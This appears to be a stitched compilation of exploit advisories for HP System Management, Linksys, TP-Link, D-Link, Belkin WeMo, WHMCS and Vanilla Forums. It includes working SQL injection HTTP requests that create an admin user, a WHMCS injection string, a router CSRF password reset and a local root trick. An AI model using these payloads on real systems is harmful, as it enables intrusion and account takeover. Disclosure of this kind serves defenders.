This module exploits an anonymous remote code execution vulnerability in HP System Management 7.1.1 and earlier. The vulnerability exists in the handling of the iprange parameter in a request against /proxy/DataValidation. For the module to work, HP System Management must be configured with Anonymous access enabled.
Some Linksys routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output from the executed command when using the cmd generic payload. A ping command against a controlled system can be used for testing purposes.
We have found a SQL injection in the group pay plugin for WHMCS. A lot of game hosting companies use this plugin. The SQL injection is in the function gp_LoadUserFromHash. It can be exploited via grouppay.php?hash=%hash%' and '1'='1
Login runs 'cat' before dropping privileges, which is easy to exploit given that the file permissions don't work. Just log in as 'local' and replace the 'cat' binary with another ELF; 'whoami' will do nicely for a PoC. Then log out and back in again. This causes your binary to run as uid 0. syscall_fstat() can also be abused to write the contents of the stat buffer to an arbitrary kernel location. There are a few other similar bugs where pointers aren't sanitised, too.
The Cyberoam Threat Research Team discovered a local buffer overflow vulnerability in Groovy Media Player 3.2.0. The software performs operations on a memory buffer but can read from or write to a memory location outside the intended boundary of the buffer. Exploiting this issue may allow attackers to execute arbitrary code in the context of the application.
Versions of HP System Management Homepage <= 7.1.2 include a setuid root smhstart binary which is vulnerable to a local buffer overflow in the SSL_SHARE_BASE_DIR environment variable.
TP-Link TD-8817 is an ADSL2+ Ethernet/USB modem router that supports a 24-Mbps downstream connection. The default user's (admin) password can easily be changed through the router's default web page listening on TCP port 80. The password change is accepted via a $_GET request; a $_POST request is not required. Save this as csrf.html: if the currently logged-in admin user visits this page, the router password will be reset to blank. You can then log in with the username admin and a blank password.
SQL injection is possible because $_POST arrays are not properly sanitized. To insert an arbitrary user, a sample HTTP POST request looks as follows:

POST /[PATH]/vanilla/entry/signin HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: [any cookie]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 399

Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions&Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO gdn_user (UserID, Name, Password, HashMethod, DateInserted, Admin, Permissions) VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0', 'Vanilla', '2013-03-28 00:00:00', '1', '');#]=abcd&Form%2FPassword=*&Form%2FSign_In=Sign+In&Checkboxes%5B%5D=RememberMe

Note that you have to take care to use the password hashing algorithm currently in use. As it is not possible to get the user table displayed on the website, an attack could be established as follows:

POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 399

Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions&Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';SELECT * FROM gdn_user;#]=abcd&Form%2FPassword=*&Form%2FSign_In=Sign+In&Checkboxes%5B%5D=RememberMe
The vulnerability is caused by missing input validation of the dst parameter together with missing session validation, and can be exploited to inject and execute arbitrary shell commands. WARNING: You do not need to be authenticated to the device to inject and execute malicious commands. Hint: on some devices, such as the DIR-645, wget is preinstalled, so malicious code can be uploaded and executed.
An arbitrary firmware update vulnerability exists in Belkin WeMo devices prior to WeMo_US_2.00.2176.PVT. An attacker can send a malicious SOAP request to the device to update the firmware with a malicious version, allowing remote code execution.